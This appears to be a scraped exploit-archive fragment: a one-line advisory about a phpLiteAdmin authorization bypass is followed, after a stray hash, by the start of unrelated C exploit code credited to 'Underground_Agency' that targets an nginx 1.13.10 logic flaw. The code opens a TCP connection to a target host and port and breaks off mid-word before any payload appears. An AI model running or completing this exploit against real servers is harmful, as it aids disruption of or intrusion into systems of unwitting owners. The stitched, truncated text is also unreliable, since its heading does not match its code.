phpLiteAdmin versions 1.9.7.1 and below suffer from an authorization bypass vulnerability.
8d2e406d93152cc028274b5875090e0a// Underground_Agency (UA) - (koa, bacL, g3kko, Dostoyevsky)
// trigger nginx 1.13.10 (latest) logic flaw / bug
// ~2018
// Tested on Ubuntu 17.10 x86 4.13.0-21-generic
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <time.h>
int main(int argc, char **argv){
int sockfd, ret;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if(sockfd < 0){
perror("socket");
exit(EXIT_FAILURE);
}
struct sockaddr_in servAddr;
memset(&servAddr, 0, sizeof(servAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(atoi(argv[2]));
servAddr.sin_addr.s_addr = inet_addr(argv[1]);
ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr));
if(ret < 0){
per